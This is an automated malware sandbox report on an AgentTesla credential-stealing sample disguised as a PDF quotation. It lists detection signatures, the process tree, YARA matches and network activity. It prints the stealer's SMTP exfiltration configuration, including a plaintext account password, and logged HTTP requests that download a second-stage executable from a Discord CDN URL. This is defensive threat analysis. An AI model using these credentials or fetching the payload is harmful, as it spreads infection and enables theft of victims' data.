Edit tour

Windows Analysis Report
QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe

Overview

General Information

Sample Name:	QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
Original Sample Name:	QUOTATION_SEPT9FIBA00541PDF.scr.exe
Analysis ID:	1310965
MD5:	a4be5e5c00ec493498b67ae5c2fd2d04
SHA1:	1c197e31fb8fde59cdd69d2f69e13dde8db55413
SHA256:	1b1c9bbe9504df699338d7e0f95579db33ae5aa611eb55559d05b116b8c80a84
Tags:	exescr
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected AgentTesla

Antivirus / Scanner detection for submitted sample

Installs a global keyboard hook

Tries to steal Mail credentials (via file / registry access)

Initial sample is a PE file and has a suspicious name

Writes to foreign memory regions

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Yara detected Costura Assembly Loader

Contains functionality to log keystrokes (.Net Source)

Machine Learning detection for sample

Allocates memory in foreign processes

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Uses ipconfig to lookup or modify the Windows network settings

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in connection with other malware

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

Uses a known web browser user agent for HTTP communication

Creates a window with clipboard capturing capabilities

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Creates a process in suspended mode (likely to inject code)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Classification

Process Tree

System is w10x64

QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe (PID: 5436 cmdline: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe MD5: A4BE5E5C00EC493498B67AE5C2FD2D04)

cmd.exe (PID: 2912 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /release MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

ipconfig.exe (PID: 6320 cmdline: ipconfig /release MD5: B0C7423D02A007461C850CD0DFE09318)

cmd.exe (PID: 6088 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /renew MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

ipconfig.exe (PID: 3052 cmdline: ipconfig /renew MD5: B0C7423D02A007461C850CD0DFE09318)

AppLaunch.exe (PID: 3928 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 4DF5F963C7E18F062E49870D0AFF8F6F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://www.secureworks.com/research/threat-profiles/gold-galleon https://asec.ahnlab.com/ko/29133/ https://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Host": "smtp.yandex.com", "Username": "frankneymars42@yandex.com", "Password": "uikstcmljdzhturh"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.383516213.000000000352F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.383516213.0000000003533000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.383676188.00000000043D0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000000.00000002.383516213.0000000003351000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.383893924.0000000005B60000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.383676188.0000000004524000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.383516213.0000000003547000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.383516213.000000000354F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000B.00000002.572091329.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000000.00000002.383676188.0000000004476000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.383516213.0000000003462000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe PID: 5436	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
decrypted.memstr	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 8 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.4524220.7.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.44e434d.10.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.44767c0.6.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.44e434d.10.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.44c432d.11.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.43e8d08.13.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.5b60000.15.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
11.2.AppLaunch.exe.400000.0.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.5b60000.15.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.43e8d08.13.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.4524220.7.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Click to see the 6 entries

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Sep 2023 16:56:19 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 233Connection: closeCF-Ray: 80935c801e2e0f70-EWRCF-Cache-Status: EXPIREDCache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Wed, 18 Sep 2024 16:56:19 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ADPycdttIlLS4DZPGnjapuaH4IH3h668kquNljQgZPe-fWubTgvAhUkGio3FmEEev5-vR5BdzhXy8itN-sa7_uEXH7GJbQX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=0RkfxpWOthSR_M4WX33SHnxwmq.PBBz9w0zzi7FHLsg-1695142579-0-AbG8MuU4t6NFaTnWZGcHy6rJMbIrxRbtsDbFI2DYzZgwas/LDld+g9kZ0Nn+nm46+7YCJcqPskzXzbnlxNokCb4=; path=/; expires=Tue, 19-Sep-23 17:26:19 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=k%2BVW9qS5olmBj5R6Wb%2BCqDqCDRUwHQy%2FmOBfXJJf5%2BA8ozfXJWPynWbtxvILTsSuLa9ycp9uR2KzoHr2ZzAOSX7wp3cbuwl3cEK2Lt341mSp1M4jseh03HjHOulGoipmwrvFLA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare

Source: AppLaunch.exe, 0000000B.00000002.572339768.0000000006A30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cdn.discordap
Source: AppLaunch.exe, 0000000B.00000002.572339768.0000000006A30000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.572339768.0000000006A66000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.572339768.0000000006A4D000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.572339768.0000000006971000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cdn.discordapp.com
Source: AppLaunch.exe, 0000000B.00000002.572339768.0000000006A30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cdn.discordapp.com/attachments/1152164172566630421/1153564703793107036/Reh
Source: AppLaunch.exe, 0000000B.00000002.572339768.0000000006A30000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.572339768.0000000006971000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cdn.discordapp.com/attachments/1152164172566630421/1153564703793107036/Rezyurp.exe
Source: AppLaunch.exe, 0000000B.00000002.572594634.0000000009D26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: AppLaunch.exe, 0000000B.00000002.572339768.0000000006A30000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.572339768.0000000006971000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: AppLaunch.exe, 0000000B.00000002.572339768.0000000006A4D000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.572339768.00000000069A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com
Source: AppLaunch.exe, 0000000B.00000002.572339768.00000000069A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/1152164172566630421/1153564703793107036/Rezyurp.exe
Source: AppLaunch.exe, 0000000B.00000002.572339768.0000000006A4D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordappD
Source: AppLaunch.exe, 0000000B.00000002.572215304.0000000000C31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://di.discordapp.com/attachments/1152164172566630421/1153564703793107036/Rezyurp.exe
Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.0000000004524000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383907625.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383516213.000000000354F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.00000000045DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.0000000004524000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383907625.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383516213.000000000354F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.00000000045DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.0000000004524000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383907625.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383516213.000000000354F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.00000000045DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.0000000004524000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383907625.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383516213.000000000354F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.00000000045DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383516213.000000000354F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.00000000045DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.0000000004524000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383907625.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.00000000045DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354

Source: unknown

DNS traffic detected: queries for: cdn.discordapp.com

Source: global traffic	HTTP traffic detected: GET /attachments/1152164172566630421/1153564703793107036/Rezyurp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/1152164172566630421/1153564703793107036/Rezyurp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: cdn.discordapp.comConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.5:49739 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Jump to behavior

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.43e8d08.13.raw.unpack, Cc3jA.cs

.Net Code: i5rm

Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383408214.000000000147B000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

memstr_e5d413dc-a

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe

Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Code function: 0_2_05C0E108	0_2_05C0E108
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Code function: 0_2_05C013A8	0_2_05C013A8
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Code function: 0_2_05C0DAD0	0_2_05C0DAD0
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Code function: 0_2_05C812B0	0_2_05C812B0
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Code function: 0_2_05C812A0	0_2_05C812A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 11_2_00FC4258	11_2_00FC4258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 11_2_00FCB460	11_2_00FCB460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 11_2_00FCE630	11_2_00FCE630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 11_2_00FC4E70	11_2_00FC4E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 11_2_00FC45A0	11_2_00FC45A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 11_2_0A5940F8	11_2_0A5940F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 11_2_0A599174	11_2_0A599174
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 11_2_0A5931F8	11_2_0A5931F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 11_2_0A595A48	11_2_0A595A48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 11_2_0A59B35A	11_2_0A59B35A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 11_2_0A590040	11_2_0A590040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 11_2_0A599168	11_2_0A599168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 11_2_0A59A668	11_2_0A59A668
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 11_2_0A59A580	11_2_0A59A580

Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000000.304485513.0000000000F25000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameWpwrtBM.exe> vs QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.00000000043D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamed1a53293-1b70-4e7d-a57e-8799cda6f341.exe4 vs QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.00000000043D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameVvtddtg.dll" vs QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.0000000004524000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383907625.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383516213.000000000354F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383516213.00000000033A6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamed1a53293-1b70-4e7d-a57e-8799cda6f341.exe4 vs QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383408214.000000000147B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.00000000045DA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Binary or memory string: OriginalFilenameWpwrtBM.exe> vs QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe

Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe

ReversingLabs: Detection: 47%

Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.log

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@13/1@2/2

Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\75b341f10c9579cbe1059d18f6f3b27b\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\75b341f10c9579cbe1059d18f6f3b27b\mscorlib.ni.dll	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5628:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5688:120:WilError_01

Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, DispatcherProductAnnotation.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.5b10000.14.raw.unpack, --.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.43e8d08.13.raw.unpack, uult.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.43e8d08.13.raw.unpack, uult.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.43e8d08.13.raw.unpack, uult.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.43e8d08.13.raw.unpack, uult.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.43e8d08.13.raw.unpack, ahU.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.43e8d08.13.raw.unpack, ahU.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.43e8d08.13.raw.unpack, fwzmQCK.cs	Cryptographic APIs: 'TransformFinalBlock'
